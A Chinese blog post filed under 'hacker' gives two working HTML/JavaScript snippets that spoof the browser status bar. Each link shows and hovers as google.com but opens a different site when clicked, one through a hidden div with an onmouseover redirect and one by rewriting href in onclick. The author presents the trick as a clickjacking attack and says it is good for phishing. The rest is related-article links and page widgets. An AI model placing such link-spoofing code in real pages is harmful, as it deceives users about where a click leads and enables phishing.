伪造浏览器的状态栏--IE和FireFox的ClickJacking

最新推荐文章于 2024-07-11 16:46:59 发布
最新推荐文章于 2024-07-11 16:46:59 发布
阅读量533 收藏
点赞数
分类专栏: hacker 文章标签: firefox 浏览器 google ie div

方法一:

先看下面一段代码:

--------------------------------------------------------------------------------------------------------------

<html>
<body>
<div id="open" οnmοuseοver="document.location='http://www.uzmix.net';"
style="position:absolute;width:8px;height:7px;background:#FFFFFF;border:1px"></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('open').style.left=mouseX-2;
document.getElementById('open').style.top=mouseY-2;
}
</script>
<center>
<br>
<br>
<a href="http://www.google.com" οnclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com</font></a>
</html>

--------------------------------------------------------------------------------------------------------------
在IE或者FireFox中执行上面这段代码,当鼠标移动到超链接www.google.com上时,IE和FireFox的状态栏都显示为google的域名,但是当点击超链接时却打开了http://www.uzmix.net。这就实现了一个简单的clickjacking的攻击,用来钓鱼还是不错的。

分析一下代码可以知道,当点击超链接时,执行的函数updatebox(event)将id为open的div移动到了鼠标下面,模拟了一个onmouseover的操作。



方法二:

其实要隐藏状态栏,其实直接使a标签的οnclick=“this.href='http://www.baidu.com'”即可,而且更具有欺骗性。

代码如下:

----------------------------------------------------------------------------------------

<html>
<body>
<a href="http://www.google.com"
οnclick="this.href='http://www.baidu.com'">http://www.google.com</a>
</html>

----------------------------------------------------------------------------------------


asli33
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【安全牛学习笔记】存储型XSS和BEEF浏览器攻击框架
edu_aqniu的博客
09-30 4874
存储型XSS                                                               长期存储于服务器端                                            每次用于访问都会被执行javascript脚本                    Name:客户端表单长度限制           
no-clickjacking
05-16
Firefox扩展v1.1: Safari Extension v1.1: 变更记录 2013-11-19 更新了不透明度检查,将所有小于0.1的不透明度视为已隐藏。 某些站点已使用负值(-1)或非零值(0.01)以避免被发现。 更新了Firefox扩展,使其...
Android 实现透明色状态栏
吕氏春秋i
08-21 457
状态栏改为透明色 需要注意: 在style中设置属性: &amp;amp;amp;lt;item name=&amp;amp;quot;android:windowTranslucentStatus&amp;amp;quot;&amp;amp;amp;gt;true&amp;amp;amp;lt;/item&amp;amp;amp;gt; &amp;amp;amp;lt;item name=&amp;amp;quot;android:win
详解浏览器跨域访问的几种办法
华为云官方博客
06-04 1145
摘要:本文讨论web前端安全问题以及应对措施,浏览器同源策略以及对资源跨域访问的几种解决方案
浏览器利用框架BeEF测试-成功截取微博账号
一杯咖啡的渗透记忆
04-26 2314
0x00 前言BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。 目前对其测试的文章不是很多,所以希望通过本次测试给大家带来全新的认识。0x01 简介工具主页:http://beefproject.com工具框架:0x02 测试环境攻击主机:操作系统:Kali 1.0 IP:192.168.16.245 测试主机:操作系统:Win7...
二、Python复习教程(重点)- 前端框架
花开如雨的博客
10-26 5044
目录导航: 文章目录目录导航:三、Web前端1.1 Web前端开发介绍1. Web网站介绍2. 动态网站开发所需的Web构件3. Web的工作原理1.2 HTML基础语法 (缺)1.3 HTML常用标签介绍1.3.1 文本标签:1.3.2 格式化标签:1.3.3 图片标签img*1.3.4 HTML中的超级链接*1.3.5 表格标签1.3.6 form表单标签 (其中1~5重点,其他了解)1.3.7 ``...`` 行内框架1.3.8 多媒体标签(了解)1.4 CSS层叠样式表介绍1.4.1 什么是CSS?
【安全牛学习笔记】存储型XSS和BEEF浏览器***框架
weixin_34054866的博客
09-30 676
存储型XSS 长期存储于服务器端 每次用于访问都会被执行javascript脚本 Name:客户端表单长度限制 ...
浏览器利用框架BeEF测试
★慕名斋★
11-07 2490
0×00 前言 http://www.vuln.cn/6966 BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。 目前对其测试的文章不是很多,所以希望通过本次测试给大家带来全新的认识。 0×01 简介 工具主页:http://beefproject.com
软件测试和质量管理——课设4
阮阮的阮阮的博客
04-04 1348
JeeSite是一款基于JavaEE和Spring Framework开发的开源企业级快速开发平台,具有权限管理、代码生成、内容管理、报表等模块,是一种突破传统开发模式,定制化需求,快速搭建企业级应用的解决方案。其使用Maven做项目管理,提高项目的易开发性、扩展性。本项目旨在对JeeSite平台进行全面的软件测试,包括:单元测试、功能测试、性能测试和安全测试,发现平台潜在的缺陷、提升软件质量、确保系统稳定性和可靠性。
小心网站敌人 别给Web应用漏洞可趁之机
HTML5中国的专栏
08-03 1543
过去,网站的内容大多是静态的。随着HTML5的流行,Web应用进入一个崭新阶段,内容的动态化和实时共享让阻拦不良内容或恶意软件变得更加复杂,公司和个人的重要信息也被暴于极为危险的网络环境之下,对于网站安全建设来说,无异于在伤口上撒上了一把盐。 别给Web应用漏洞可趁之机" title="小心网站敌人 别给Web应用漏洞可趁之机" style="margin-top:0px; ma
防止页面被iframe(兼容IE,Firefox火狐)
09-05
本文将详细介绍如何在不同浏览器,特别是兼容IE和Firefox火狐的情况下,防止页面被iframe。 首先,我们来看一下早期用于防止页面被iframe的JavaScript代码: ```javascript if (top.location !== self.location) ...
Clickjacking Test-crx插件
04-02
语言:English Offcon Info Security的点击劫持测试 此chrome扩展程序将检查是否可以对当前网页进行格式化,甚至生成用于安全报告的概念证明HTML。
web-security-fundamentals::school:Mike的网络安全课程
04-28
课程大纲和幻灯片 有几块? 用于Sass编译的 用于提供HTML和CSS的(从Sass编译) 作为CLI运行的基础 设定 为了准备好此课程,您需要确保已安装一些内容。 Node.js 您将需要安装相对较新的node.js版本(最好是v4.5...
IE8的一些有趣的新功能
09-27
然而,对于已经转移到其他浏览器的用户,IE8并没有提供足够的理由让他们回心转意,因为许多IE8的新功能可以通过Firefox的扩展和类似Greasemonkey的工具实现。 总的来说,IE8是一个相对成功的升级,尤其对于习惯使用...
【Tomcat目录详解】关于Tomcat你还需要了解的详细内容
一捌柒的博客
07-11 690
除了Tomcat的基础安装和配置外,我们还需要知道Tomcat中各个文件的作用和注意点
odoo12中国化财务核算解决方案2.30E (1).pdf
最新发布
07-11
odoo12中国化财务核算解决方案2.30E (1)
个人学习整理的Spark的安装说明.txt
07-11
个人学习整理的Spark的安装说明.txt
厦门大学毕业答辩PPT模板
07-11
【作品名称】:厦门大学毕业答辩PPT模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
Clickjacking: X-Frame-Options header
01-10
Clickjacking是一种网络攻击,攻击者通过在一个网页上覆盖一个透明的iframe来欺骗用户点击一个看似无害的按钮或链接,实际上却触发了隐藏的恶意操作。为了防止Clickjacking攻击,可以使用X-Frame-Options头部来限制...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值